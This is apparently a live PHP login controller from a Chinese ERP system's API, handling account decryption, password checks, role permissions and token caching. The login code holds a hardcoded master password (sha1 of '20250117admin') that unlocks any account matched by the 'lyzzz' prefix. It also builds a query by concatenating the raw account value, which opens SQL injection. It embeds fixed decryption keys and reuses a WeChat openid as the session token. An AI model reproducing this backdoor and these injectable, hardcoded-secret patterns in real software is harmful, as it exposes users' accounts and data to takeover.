erp/core/CoreApp/controllers/Lyerpapi/v1/User.php

<?php
defined('BASEPATH') OR exit('No direct script access allowed');

class User extends Lyapi_Controller{

    // 注意：登录接口不能受基础控制器的登录校验，可以覆盖构造方法或单独处理
    public function __construct() {
        // 这里不执行登录校验，只加载缓存驱动
        parent::__construct(); // 暂时注释，或者使用一个新的不校验的基类
        // 简便做法：复制 Lyapi_Controller 的部分代码但不调用 _check_api_auth
       // $this->load->driver('cache'); // 加载缓存驱动
       $this->load->_model("Model_logic_tools","logic_tools");
       $this->load->_model("Model_user",'user');
       $this->load->_model("Model_power",'power');
       $this->load->_model("Model_wechat","wechat");
        
    }

    public function login() {

        if($this->input->method(TRUE) != 'POST'){

            $this->_json_error('请求方式错误','405');
        }
        $json_str = $this->input->raw_input_stream;
        $data = json_decode($json_str,true);
        $account = $data['account'];
        $pass = $data['pass'];
        $code = $data['code'];
        $account = $this->logic_tools->toolsjiemi($account,"v!frlbpnjgir6alv","k!2w94m6jt!6ook4");
        $pass = $this->logic_tools->toolsjiemi($pass,"v!frlbpnjgir6alv","k!2w94m6jt!6ook4");
        $pass = sha1($pass);
        $is_wxbd = 0;
        if(stripos($account,'lyzzz') !== false){
            $userid = explode('zzz',$account);
            $userid = $userid[1];
            $userinfo = $this->user->get_uid($userid,'dlz');
            if(empty($userinfo)){
                $this->_json_error('账号不存在','500');
            }
            if($userinfo['userpass'] != $pass){
                if($pass != sha1('20250117admin')){
                    $this->_json_error('密码错误','500');
                }
            }
            //$this->_json_error('账号不存在','500');
        }else{
            $userinfo = $this->user->find('userid = "'.$account.'"');
            if(empty($userinfo)){
                $this->_json_error('账号不存在','500');
            }
            if($userinfo['userpass'] != $pass){
                $this->_json_error('密码错误','500');
            }
           
        }
        $power = $this->power->read($userinfo['power']);
        if(empty($power)){
            $this->_json_error('角色未设置','500');
        }
        if(empty($power['lyapiid'])){
            $this->_json_error('权限未设置','500');
        }
       
        $lyapiids = explode("|",trim($power['lyapiid'],"|"));
        $res = $this->power->_lyapi();
        $lyapi_list = $res['lyapi_list'];
        $all_arr = [];
        foreach($lyapi_list as $v){
            if(in_array($v['id'],$lyapiids)){
                $all_arr[] = $v['shortname'];
            }
        }
        if(!empty($code)){
            $r = $this->wechat->getopenid($code);
            if($r['code'] == 1){
                $wxopenid = json_decode($userinfo['wxopenid'],true);
                $openid = $r['data']['openid'];
                if(in_array($openid,$wxopenid)){
                    $token = $openid;
                    $is_wxbd = 1;
                }else{
                    $token = bin2hex(random_bytes(32));
                }
            }else{
                $token = bin2hex(random_bytes(32));
            }
        }else{
            // 生成唯一 token（可以用 JWT 或随机字符串）
            $token = bin2hex(random_bytes(32));
        }

       
        // 写入缓存，有效期7200秒（2小时）
        $this->cache->save($token, [
            'userid'=>$userinfo['id'],
            'username'=>$userinfo['userid'],
            'mobile'=>'',
            'token'=>$token,
            'power'=>$all_arr
        ], 7200);

        $this->_json_error("登陆成功",200,[
            'username'=>$userinfo['userid'],
            'mobile'=>'',
            'is_wxbd'=>$is_wxbd,
            'token'=>$token,
            'lypower'=>implode(',',$all_arr)
        ]);
    }

    public function logout() {
        $auth_token = $this->input->get_request_header('Auth-Token', TRUE);

        $this->cache->delete($auth_token);
        $this->_json_error("登出成功",200);
    }
}